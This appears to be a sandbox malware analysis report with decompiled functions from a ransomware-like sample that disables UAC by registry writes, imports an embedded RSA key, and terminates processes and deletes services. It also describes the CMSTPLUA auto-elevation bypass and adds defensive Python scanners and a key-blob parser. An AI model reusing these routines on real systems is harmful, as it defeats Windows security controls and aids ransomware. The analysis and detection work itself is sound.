                                      • Opcode Fuzzy Hash: d951cc5b706ff3fdffc3273f12f72aeccf58b7afee90d8467e6e5a35d7286264
                                      • Instruction Fuzzy Hash: AE416DB1944318EFCB24EF64DC89BDAB7B4AB48700F0056E9E50DB6291EB755A88CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
			E00E70BB0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v12;
				char _v16;
				void* _v20;
				intOrPtr _v24;
				signed int _t15;
				void* _t28;
				void* _t38;
				void* _t39;
				signed int _t40;

				_t39 = __esi;
				_t38 = __edi;
				_t28 = __ebx;
				_t15 =  *0xeef074; // 0x221cac15 (/GS stack-cookie seed, verified by E00E89A35 on return)
				_v8 = _t15 ^ _t40;
				_v24 = __ecx;
				// E00E70AE0 opens the current process token and queries information class 0x14
				// (TokenElevation, a 4-byte TOKEN_ELEVATION). The policy writes below need write
				// access to HKLM, so they only succeed from an elevated process anyway.
				if((E00E70AE0(_v24) & 0x000000ff) != 0) {
					// 0x80000002 = HKEY_LOCAL_MACHINE, 0x20006 = KEY_WRITE
					if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, 0x20006,  &_v20) == 0) {
						_v12 = 0;
						// EnableLUA = REG_DWORD (type 4) 0: UAC is switched off entirely after the next reboot
						RegSetValueExW(_v20, L"EnableLUA", 0, 4,  &_v12, 4);
						RegCloseKey(_v20);
					}
					_t36 =  &_v20;
					if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, 0x20006,  &_v20) == 0) {
						_v16 = 0;
						// ConsentPromptBehaviorAdmin = 0: administrators elevate without any prompt;
						// this takes effect immediately and covers the time until that reboot
						RegSetValueExW(_v20, L"ConsentPromptBehaviorAdmin", 0, 4,  &_v16, 4);
						_t36 = _v20;
						RegCloseKey(_v20);
					}
				}
				_t14 =  &_v8; // 0xe55d52
				return E00E89A35(_t28,  *_t14 ^ _t40, _t36, _t38, _t39);
			}

Address column for the listing above: 0x00e70bb0 to 0x00e70c75.

                                      APIs
                                        • Part of subcall function 00E70AE0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00E70B04
                                        • Part of subcall function 00E70AE0: OpenProcessToken.ADVAPI32(00000000), ref: 00E70B0B
  • Part of subcall function 00E70AE0: GetTokenInformation.ADVAPI32(00000000,00000014(TokenElevation),?,00000004,00000004), ref: 00E70B31
                                        • Part of subcall function 00E70AE0: CloseHandle.KERNEL32(00000000), ref: 00E70B5B
                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00020006,?,?,?,?,?,00E55D52,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E70BEB
                                      • RegSetValueExW.ADVAPI32(?,EnableLUA,00000000,00000004,00000000,00000004), ref: 00E70C0F
                                      • RegCloseKey.ADVAPI32(?), ref: 00E70C19
                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00020006,?,?,?,?,?,00E55D52,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E70C34
                                      • RegSetValueExW.ADVAPI32(?,ConsentPromptBehaviorAdmin,00000000,00000004,00000000,00000004), ref: 00E70C58
                                      • RegCloseKey.ADVAPI32(?), ref: 00E70C62
                                      Strings
                                      • EnableLUA, xrefs: 00E70C06
                                      • R], xrefs: 00E70C68
                                      • ConsentPromptBehaviorAdmin, xrefs: 00E70C4F
                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00E70C2A
                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00E70BE1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpen$ProcessTokenValue$CurrentHandleInformation
                                      • String ID: ConsentPromptBehaviorAdmin$EnableLUA$R]$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                      • API String ID: 884832700-1360035613
                                      • Opcode ID: 69bc45f4f20ca7bfd9519a87bf0f53d6e9182cc213850ecb91c6c5ca181bdaf6
                                      • Instruction ID: 1aa9d792743c00b6e589f8f8cb65b7ccfcdf4baf8500c2819bffecdb7f178a0c
                                      • Opcode Fuzzy Hash: 69bc45f4f20ca7bfd9519a87bf0f53d6e9182cc213850ecb91c6c5ca181bdaf6
                                      • Instruction Fuzzy Hash: 76116AB0A80319ABEB20DBA1DC46F7EB379BB44B00F104558B715BA1D0DA70A908CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%
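Taken together, the function whose APIs are listed at 00E70CBB to 00E70E3D and E00E70BB0 above give the sample its UAC handling: the first asks COM for CMSTPLUA ({3E5FC7F9-9A51-4367-9063-A120244FBEC7}) through the `Elevation:Administrator!new:` moniker and requests ICMLuaUtil ({6EDD6D74-C007-4E75-B76A-E5740995E24C}), the auto-elevating interface whose ShellExec method runs a command at high integrity without a consent prompt; the second then writes EnableLUA=0 and ConsentPromptBehaviorAdmin=0 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System. The Python scanner below is an added example, not code from the report or from the sample: it searches a dropped file or memory dump for those indicators in the forms the report shows (ASCII moniker and GUID strings, UTF-16LE registry strings for the W APIs) and, going beyond the report, also for each GUID's 16-byte binary layout. The scanned buffer is constructed inline; the indicator names and the two verdict rules are this example's own.

```python
"""
Hunt for the two UAC capabilities shown in the decompiled functions above:
the CMSTPLUA elevation moniker handed to CoGetObject, and the HKLM policy
writes of E00E70BB0. Added example for triage of a dropped file or memory
dump; it is not the sample's code and the scanned buffer below is constructed.
"""
import uuid

# Indicators copied from the report's string and API annotations.
CMSTPLUA_CLSID = "3E5FC7F9-9A51-4367-9063-A120244FBEC7"   # auto-elevating CMSTPLUA COM server
ICMLUAUTIL_IID = "6EDD6D74-C007-4E75-B76A-E5740995E24C"   # ICMLuaUtil (ShellExec runs elevated)
ELEVATION_MONIKER = "Elevation:Administrator!new:"
UAC_POLICY_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
UAC_VALUES = ("EnableLUA", "ConsentPromptBehaviorAdmin")


def encodings(s: str):
    """(label, bytes) for the ASCII and UTF-16LE forms; the sample uses both A and W APIs."""
    return [("ascii", s.encode("ascii")), ("utf16le", s.encode("utf-16-le"))]


def guid_patterns(guid: str):
    """Braced string forms plus the 16-byte little-endian layout CLSIDFromString produces
    (the binary form is this example's generalisation; the report shows GUIDs as strings)."""
    return encodings("{" + guid + "}") + [("binary", uuid.UUID(guid).bytes_le)]


def find_all(buf: bytes, needle: bytes):
    """Every offset at which needle occurs in buf (case-sensitive)."""
    offsets, i = [], buf.find(needle)
    while i != -1:
        offsets.append(i)
        i = buf.find(needle, i + 1)
    return offsets


def scan_uac_indicators(buf: bytes) -> dict:
    """
    Return {'hits': {indicator: [(encoding, offset), ...]},
            'cmstp_uac_bypass': bool, 'uac_registry_tamper': bool}.
    """
    hits = {}

    def record(name, patterns):
        for label, needle in patterns:
            for off in find_all(buf, needle):
                hits.setdefault(name, []).append((label, off))

    record("elevation_moniker", encodings(ELEVATION_MONIKER))
    record("cmstplua_clsid", guid_patterns(CMSTPLUA_CLSID))
    record("icmluautil_iid", guid_patterns(ICMLUAUTIL_IID))
    record("uac_policy_key", encodings(UAC_POLICY_KEY))
    for value in UAC_VALUES:
        record("uac_value:" + value, encodings(value))

    # The moniker prefix is generic COM; it is the CMSTPLUA CLSID behind it that
    # makes the elevation silent, so require both before calling it a bypass.
    cmstp = "elevation_moniker" in hits and "cmstplua_clsid" in hits
    # Policy key plus at least one of the two value names is the E00E70BB0 pattern.
    tamper = "uac_policy_key" in hits and any(k.startswith("uac_value:") for k in hits)
    return {"hits": hits, "cmstp_uac_bypass": cmstp, "uac_registry_tamper": tamper}


def build_demo_buffer() -> bytes:
    """Constructed stand-in for a dump: the indicators as the report shows them
    (moniker and GUIDs as ASCII, registry strings UTF-16LE for the W APIs), plus
    one GUID in its binary form, separated by zero padding."""
    pad = b"\x00" * 64
    return (pad + ELEVATION_MONIKER.encode("ascii")
            + pad + ("{" + CMSTPLUA_CLSID + "}").encode("ascii")
            + pad + ("{" + ICMLUAUTIL_IID + "}").encode("ascii")
            + pad + uuid.UUID(CMSTPLUA_CLSID).bytes_le
            + pad + UAC_POLICY_KEY.encode("utf-16-le")
            + pad + "EnableLUA".encode("utf-16-le")
            + pad + "ConsentPromptBehaviorAdmin".encode("utf-16-le") + pad)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_demo_buffer()
    result = scan_uac_indicators(data)
    for name, where in sorted(result["hits"].items()):
        print(f"{name:34s} {where}")
    print("CMSTPLUA UAC bypass :", result["cmstp_uac_bypass"])
    print("UAC registry tamper :", result["uac_registry_tamper"])
```

Point it at an unpacked dump rather than the packed file on disk; the report's strings come from the 00E50000 memory region, and a packer will hide all of them in the original executable. The same indicator pairs are what a YARA rule for this capability would encode.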

                                      C-Code - Quality: 100%
			E00E65DA0(void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi, char _a4) {
				signed int _v8;
				int _v12;
				char _v13;
				void* _v20;
				intOrPtr _v24;
				signed int _t24;
				void* _t43;
				void* _t57;
				void* _t58;
				signed int _t59;

				_t58 = __esi;
				_t57 = __edi;
				_t54 = __edx;
				_t43 = __ebx;
				_t24 =  *0xeef074; // 0x221cac15 (/GS stack-cookie seed)
				_v8 = _t24 ^ _t59;
				_v24 = __ecx;   // this: +0x4 receives the HCRYPTKEY, +0xc holds the HCRYPTPROV
				_v13 = 0;       // success flag, set only after CryptImportKey returns nonzero
				_t4 =  &_a4; // 0xe65558
				// E00E579A0 is what the plugin labels std::ios_base::good; it is applied to the
				// string argument and gates the whole import. The base64 text comes from
				// E00E57E90(), whose return value is not in this report.
				if((E00E579A0( *_t4) & 0x000000ff) == 0) {
					_v12 = 0;
					// First call: cchString 0 (NUL-terminated), dwFlags 1 = CRYPT_STRING_BASE64,
					// pbBinary NULL, so only the decoded length is returned in _v12.
					if(CryptStringToBinaryA(E00E57E90(), 0, 1, 0,  &_v12, 0, 0) != 0) {
						_t54 = _v12;
						_v20 = HeapAlloc(GetProcessHeap(), 0, _v12);
						if(_v20 != 0) {
							// Second call decodes into the freshly allocated buffer.
							if(CryptStringToBinaryA(E00E57E90(), 0, 1, _v20,  &_v12, 0, 0) != 0) {
								_t54 = _v24;
								// hPubKey 0 and dwFlags 0: the decoded bytes are a plain key blob
								// (PUBLICKEYBLOB, PRIVATEKEYBLOB or PLAINTEXTKEYBLOB), not a
								// SIMPLEBLOB wrapped by another key.
								if(CryptImportKey( *(_v24 + 0xc), _v20, _v12, 0, 0, _v24 + 4) != 0) {
									_v13 = 1;
								}
							}
							HeapFree(GetProcessHeap(), 0, _v20);
						}
					}
				}
				return E00E89A35(_t43, _v8 ^ _t59, _t54, _t57, _t58);
			}

Address column for the listing above: 0x00e65da0 to 0x00e65e80.

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E65DBA
                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00E65DEC
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E65DFC
                                      • HeapAlloc.KERNEL32(00000000), ref: 00E65E03
                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00E65E2B
                                      • CryptImportKey.ADVAPI32(?,00000000,00000000,00000000,00000000,?), ref: 00E65E4F
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E65E63
                                      • HeapFree.KERNEL32(00000000), ref: 00E65E6A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Crypt$BinaryProcessString$AllocFreeImportstd::ios_base::good
                                      • String ID: XU$XU
                                      • API String ID: 3608890991-1099084465
                                      • Opcode ID: efddd7acaa3096fe1b760353a3da5bfea703ef289f7680116e0951d3290f7663
                                      • Instruction ID: f40daa27225d021c9f1936a332ad331e7895548abe3f1096db235b012cac3fe3
                                      • Opcode Fuzzy Hash: efddd7acaa3096fe1b760353a3da5bfea703ef289f7680116e0951d3290f7663
                                      • Instruction Fuzzy Hash: 973181B1B40208AFDB00DBA0DC5AFAFBBB9AB44700F004458F605BB2C1DB71AA05CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%
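E00E65DA0 above base64-decodes a string (CryptStringToBinaryA with dwFlags 1, CRYPT_STRING_BASE64) and hands the result to CryptImportKey(hProv, blob, len, 0, 0, &hKey). With hPubKey 0 the bytes must be a plain CryptoAPI key blob; for ransomware that is typically the operator's RSA public key, a PUBLICKEYBLOB whose base64 form starts with `BgIAAACkAABSU0Ex`, but the report does not show the string E00E57E90() returns. The Python below is an added example, not the sample's code: it implements the blob layout from a constructed key so the parser can run offline, and parses a PUBLICKEYBLOB back into its fields, handling as a generalisation the PRIVATEKEYBLOB variant that shares the same 20-byte prefix. The demo modulus and exponents are invented values, not a real key pair and not the sample's key.

```python
"""
Parse the CryptoAPI key blob that E00E65DA0 base64-decodes (CryptStringToBinaryA
with CRYPT_STRING_BASE64) and imports with CryptImportKey. Added example: not the
sample's code; the key below is constructed for the demo, not recovered from it.
"""
import base64
import binascii
import struct

PUBLICKEYBLOB, PRIVATEKEYBLOB = 0x06, 0x07
CUR_BLOB_VERSION = 0x02
CALG_RSA_KEYX, CALG_RSA_SIGN = 0x0000A400, 0x00002400
RSA1, RSA2 = 0x31415352, 0x32415352        # 'RSA1' / 'RSA2' read as little-endian DWORDs
HEADER_B64_PREFIX = "BgIAAACkAABSU0Ex"     # base64 of a CALG_RSA_KEYX PUBLICKEYBLOB header

# Constructed demo key: invented numbers, not a real key pair, not the sample's key.
DEMO_BITS, DEMO_E, DEMO_N = 512, 65537, (1 << 511) + 0x1234567


def build_rsa_public_blob(n: int, e: int, bitlen: int) -> bytes:
    """BLOBHEADER + RSAPUBKEY + little-endian modulus, the layout CryptExportKey emits."""
    header = struct.pack("<BBHI", PUBLICKEYBLOB, CUR_BLOB_VERSION, 0, CALG_RSA_KEYX)
    return header + struct.pack("<III", RSA1, bitlen, e) + n.to_bytes(bitlen // 8, "little")


def build_rsa_private_blob(n, e, p, q, dp, dq, qinv, d, bitlen: int) -> bytes:
    """PRIVATEKEYBLOB: same prefix with bType 0x07 / magic 'RSA2', then p, q, dp, dq, qinv, d."""
    header = struct.pack("<BBHI", PRIVATEKEYBLOB, CUR_BLOB_VERSION, 0, CALG_RSA_KEYX)
    half, full = bitlen // 16, bitlen // 8
    crt = b"".join(x.to_bytes(half, "little") for x in (p, q, dp, dq, qinv))
    return header + struct.pack("<III", RSA2, bitlen, e) + n.to_bytes(full, "little") + crt + d.to_bytes(full, "little")


def demo_base64_blob() -> str:
    """The demo public key in the form the sample stores its key: base64 text."""
    return base64.b64encode(build_rsa_public_blob(DEMO_N, DEMO_E, DEMO_BITS)).decode()


def parse_cryptoapi_rsa_blob(data) -> dict:
    """
    Take the blob as raw bytes or as base64 text and return its fields.
    Handles the PUBLICKEYBLOB the decompiled function imports and, as a
    generalisation, a PRIVATEKEYBLOB, which shares the 20-byte prefix.
    """
    if isinstance(data, str):
        data = base64.b64decode(data, validate=True)
    if len(data) < 20:
        raise ValueError("blob shorter than BLOBHEADER + RSAPUBKEY")
    btype, version, reserved, alg = struct.unpack_from("<BBHI", data, 0)
    magic, bitlen, pubexp = struct.unpack_from("<III", data, 8)
    if version != CUR_BLOB_VERSION or reserved != 0:
        raise ValueError("unexpected BLOBHEADER version/reserved")
    if alg not in (CALG_RSA_KEYX, CALG_RSA_SIGN):
        raise ValueError(f"not an RSA blob: aiKeyAlg=0x{alg:08x}")
    if (btype, magic) not in ((PUBLICKEYBLOB, RSA1), (PRIVATEKEYBLOB, RSA2)):
        raise ValueError(f"bType/magic mismatch: 0x{btype:02x} / 0x{magic:08x}")
    if bitlen == 0 or bitlen % 16:
        raise ValueError(f"implausible bitlen {bitlen}")

    full, half = bitlen // 8, bitlen // 16
    fields = [("modulus", full)]
    if btype == PRIVATEKEYBLOB:   # RSA2 appends the CRT parameters, then d
        fields += [("p", half), ("q", half), ("dp", half), ("dq", half), ("qinv", half), ("d", full)]
    if len(data) < 20 + sum(size for _, size in fields):
        raise ValueError("blob truncated")

    out = {"type": "PUBLICKEYBLOB" if btype == PUBLICKEYBLOB else "PRIVATEKEYBLOB",
           "alg": "CALG_RSA_KEYX" if alg == CALG_RSA_KEYX else "CALG_RSA_SIGN",
           "bitlen": bitlen, "exponent": pubexp}
    off = 20
    for name, size in fields:     # every integer in a CryptoAPI blob is little-endian
        out[name] = int.from_bytes(data[off:off + size], "little")
        off += size
    return out


def is_valid_rsa_blob(data) -> bool:
    """True when the blob parses; use it to filter candidate base64 strings from a dump."""
    try:
        parse_cryptoapi_rsa_blob(data)
        return True
    except (ValueError, binascii.Error):
        return False


if __name__ == "__main__":
    b64 = demo_base64_blob()
    print("base64 blob :", b64[:32] + "...")
    key = parse_cryptoapi_rsa_blob(b64)
    print(f"{key['type']} {key['alg']} {key['bitlen']}-bit e={key['exponent']}")
    print("n =", hex(key["modulus"]))
```

Feed it the base64 strings pulled from the 00E50000 dump: any string `is_valid_rsa_blob` accepts is a candidate embedded key, and the parsed modulus is the value to compare across samples when linking builds to one operator. A PUBLICKEYBLOB cannot decrypt anything, so finding it confirms the scheme but does not recover files.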

                                      C-Code - Quality: 86%
			E00E6EA80(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v16;
				signed int _v20;
				char _v21;
				char _v544;
				long _v572;
				void* _v580;
				signed char _v581;
				void* _v588;
				char _v589;
				void* _v596;
				intOrPtr _v600;
				char _v624;
				signed int _t31;
				signed int _t32;
				int _t41;
				void* _t54;
				void* _t74;
				signed int _t75;

				_t74 = __esi;
				_t73 = __edi;
				_t54 = __ebx;
				_push(0xffffffff);      // SEH frame registration for the local string object (_v624)
				_push(0xec18b0);
				_push( *[fs:0x0]);
				_t31 =  *0xeef074; // 0x221cac15 (/GS stack-cookie seed)
				_t32 = _t31 ^ _t75;
				_v20 = _t32;
				_push(_t32);
				 *[fs:0x0] =  &_v16;
				_v600 = __ecx;
				_v589 = 0;
				// _a4 is the caller-supplied process name to hunt for; when E00E579A0 (labelled
				// std::ios_base::good by the plugin) flags it, the process walk is skipped.
				if((E00E579A0(_a4) & 0x000000ff) != 0) {
					L8:
					__eflags = 0;
				} else {
					// 2 = TH32CS_SNAPPROCESS
					_v588 = CreateToolhelp32Snapshot(2, 0);
					if(_v588 == 0xffffffff) {
						goto L8;
					} else {
						// _v580 is a PROCESSENTRY32W: 0x22c = sizeof, _v572 = th32ProcessID (+8),
						// _v544 = szExeFile (+36)
						E00EA1270(__edi,  &_v580, 0, 0x22c);
						_v580 = 0x22c;
						_push( &_v580);
						_t41 = Process32FirstW(_v588);
						_t81 = _t41;
						if(_t41 == 0) {
							L7:
							_t69 = _v588;
							CloseHandle(_v588);
							goto L8;
						} else {
							do {
								// Wrap szExeFile in a string (_v624) and compare it with _a4 in
								// E00E6EBF0 (the comparison body is not in this extract).
								E00E57CD0(_t54,  &_v624, _t73, _t74, _t81,  &_v544);
								_v581 = E00E6EBF0( &_v21, _t73, _a4,  &_v624);
								E00E57B40( &_v624);
								if((_v581 & 0x000000ff) == 0) {
									goto L6;
								} else {
									// 1 = PROCESS_TERMINATE, the only right TerminateProcess needs
									_v596 = OpenProcess(1, 0, _v572);
									if(_v596 == 0) {
										goto L6;
									} else {
										TerminateProcess(_v596, 0);
										_t69 = _v596;
										CloseHandle(_v596);
									}
								}
								// As decompiled, a successful kill jumps straight to the epilogue:
								// no Process32NextW and no CloseHandle on the snapshot (L7), so one
								// call terminates at most one matching process and leaks the handle.
								goto L9;
								L6:
								__eflags = Process32NextW(_v588,  &_v580);
							} while (__eflags != 0);
							goto L7;
						}
					}
				}
				L9:
				 *[fs:0x0] = _v16;
				return E00E89A35(_t54, _v20 ^ _t75, _t69, _t73, _t74);
			}

Address column for the listing above: 0x00e6ea80 to 0x00e6ebe9 (the 0x00000000 entries belong to the decompiler's goto lines).

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E6EABC
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E6EAD0
                                      • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 00E6EB17
                                      • task.LIBCPMTD ref: 00E6EB56
                                      • OpenProcess.KERNEL32(00000001,00000000,?,00E560D8,?,?), ref: 00E6EB71
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E6EB8F
                                      • CloseHandle.KERNEL32(00000000), ref: 00E6EB9C
                                      • Process32NextW.KERNEL32(000000FF,0000022C), ref: 00E6EBB4
                                      • CloseHandle.KERNEL32(000000FF), ref: 00E6EBC9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32std::ios_base::goodtask
                                      • String ID:
                                      • API String ID: 211509562-0
                                      • Opcode ID: 0f048129615d9a71c5dde01efd2f9d256af9b6c4750cfd372ed7ce831b1c3754
                                      • Instruction ID: 923f35508edaed5e4e7557689395390617fe1aa616622359508321c111935a48
                                      • Opcode Fuzzy Hash: 0f048129615d9a71c5dde01efd2f9d256af9b6c4750cfd372ed7ce831b1c3754
                                      • Instruction Fuzzy Hash: 1D415C759442189FCB24DF64EC99FEEB7B4FB48700F0042E9A60AB62D1DB315A88CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00E6EED0(intOrPtr __ecx, char _a4) {
                                      				char _v5;
                                      				char _v6;
                                      				void* _v12;
                                      				void* _v16;
                                      				intOrPtr _v20;
                                      
                                      				_v20 = __ecx;
                                      				_v6 = 0;
                                      				_t3 =  &_a4; // 0xe56039
                                      				if((E00E579A0( *_t3) & 0x000000ff) == 0) {
                                      					_v16 = OpenSCManagerW(0, 0, 0xf003f);
                                      					if(_v16 != 0) {
                                      						_v12 = OpenServiceW(_v16, E00E57A40(), 0x10020);
                                      						if(_v12 != 0) {
                                      							if(DeleteService(_v12) == 0) {
                                      								_v5 = 0;
                                      							} else {
                                      								_v5 = 1;
                                      							}
                                      							_v6 = _v5;
                                      							CloseServiceHandle(_v12);
                                      						}
                                      						CloseServiceHandle(_v16);
                                      					}
                                      				}
                                      				return _v6;
                                      			}

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E6EEE0
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00E56039,00000000,00000000,00000000,00000000,00000000,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E6EEF5
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00010020), ref: 00E6EF16
                                      • DeleteService.ADVAPI32(00000000), ref: 00E6EF29
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00E6EF47
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00E6EF51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandleOpen$DeleteManagerstd::ios_base::good
                                      • String ID: 9`
                                      • API String ID: 3780257426-621162546
                                      • Opcode ID: 2528a37356bd727c6ede399f9d347416afa518848873caed3886be50206b35b6
                                      • Instruction ID: c6c1d93d24bb09aa976221fc7f645b46a705dd2b2da2029ae0a96210b0ad37ed
                                      • Opcode Fuzzy Hash: 2528a37356bd727c6ede399f9d347416afa518848873caed3886be50206b35b6
                                      • Instruction Fuzzy Hash: AF118678A48248EFC710DBA5D819BAEBF746F54341F008098E541773C1C6758549CB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 71%
                                      			E00EB8FAA(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
                                      				intOrPtr* _v8;
                                      				signed int _v12;
                                      				intOrPtr _v40;
                                      				signed int _v52;
                                      				char _v252;
                                      				short _v292;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* _t33;
                                      				short* _t34;
                                      				intOrPtr* _t35;
                                      				void* _t37;
                                      				intOrPtr* _t38;
                                      				signed short _t39;
                                      				signed short* _t42;
                                      				intOrPtr _t45;
                                      				void* _t47;
                                      				signed int _t50;
                                      				void* _t52;
                                      				signed int _t56;
                                      				void* _t69;
                                      				void* _t73;
                                      				void* _t74;
                                      				void* _t78;
                                      				intOrPtr* _t85;
                                      				short* _t87;
                                      				void* _t89;
                                      				intOrPtr* _t92;
                                      				intOrPtr* _t96;
                                      				signed int _t114;
                                      				void* _t115;
                                      				intOrPtr* _t117;
                                      				intOrPtr _t120;
                                      				signed int* _t121;
                                      				void* _t122;
                                      				intOrPtr* _t124;
                                      				signed short _t126;
                                      				int _t128;
                                      				void* _t129;
                                      				void* _t132;
                                      				signed int _t133;
                                      
                                      				_push(__ecx);
                                      				_push(__ecx);
                                      				_t85 = _a4;
                                      				_t33 = E00EB0EFC(__ecx, __edx);
                                      				_t114 = 0;
                                      				_v12 = 0;
                                      				_t3 = _t33 + 0x50; // 0x50
                                      				_t124 = _t3;
                                      				_t4 = _t124 + 0x250; // 0x2a0
                                      				_t34 = _t4;
                                      				 *((intOrPtr*)(_t124 + 8)) = 0;
                                      				 *_t34 = 0;
                                      				_t6 = _t124 + 4; // 0x54
                                      				_t117 = _t6;
                                      				_v8 = _t34;
                                      				_t92 = _t85;
                                      				_t35 = _t85 + 0x80;
                                      				 *_t124 = _t85;
                                      				 *_t117 = _t35;
                                      				if( *_t35 != 0) {
                                      					E00EB8F3D(0xecc260, 0x16, _t117);
                                      					_t92 =  *_t124;
                                      					_t132 = _t132 + 0xc;
                                      					_t114 = 0;
                                      				}
